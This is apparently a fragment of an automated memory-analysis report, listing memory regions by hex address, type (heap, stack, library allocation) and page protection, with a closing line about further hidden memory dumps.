trusted library allocation
page read and write
1135000
heap
page read and write
4D10000
trusted library allocation
page read and write
90E000
stack
page read and write
FAA000
heap
page read and write
6C620000
unkown
page readonly
11DE000
stack
page read and write
575B000
stack
page read and write
303F000
trusted library allocation
page read and write
FFF000
heap
page read and write
2F21000
trusted library allocation
page read and write
5D59000
trusted library allocation
page read and write
308C000
trusted library allocation
page read and write
8399000
heap
page read and write
3053000
trusted library allocation
page read and write
5FB2000
heap
page read and write
4CEE000
stack
page read and write
2642000
trusted library allocation
page read and write
2F25000
trusted library allocation
page read and write
825000
heap
page read and write
8779000
heap
page read and write
656D000
stack
page read and write
9663000
trusted library allocation
page read and write
8DCE000
stack
page read and write
5423000
trusted library allocation
page read and write
BD0000
heap
page read and write
5BC3000
heap
page read and write
4141000
heap
page read and write
77D5000
heap
page read and write
2C9C000
heap
page read and write
5D29000
heap
page read and write
334E000
stack
page read and write
277B000
trusted library allocation
page read and write
2E61000
trusted library allocation
page read and write
248E000
stack
page read and write
2786000
trusted library allocation
page read and write
A362000
trusted library allocation
page read and write
83C7000
heap
page read and write
2E6B000
trusted library allocation
page read and write
87BA000
heap
page read and write
2C4B000
heap
page read and write
4074000
trusted library allocation
page read and write
2FF9000
trusted library allocation
page read and write
2F9C000
trusted library allocation
page read and write
7150000
heap
page read and write
3E31000
trusted library allocation
page read and write
279B000
trusted library allocation
page read and write
3EEC000
heap
page read and write
2B85000
heap
page read and write
FAC000
heap
page read and write
725E000
stack
page read and write
FAA000
heap
page read and write
6C180000
unkown
page readonly
4CAC000
stack
page read and write
4B60000
heap
page read and write
2803000
trusted library allocation
page read and write
2952000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
3045000
trusted library allocation
page read and write
9F18000
trusted library allocation
page read and write
52F9000
trusted library allocation
page read and write
9C3000
trusted library allocation
page read and write
1100000
heap
page read and write
272D000
trusted library allocation
page read and write
BB2000
trusted library allocation
page read and write
There are 2995 hidden memdumps, click here to show them.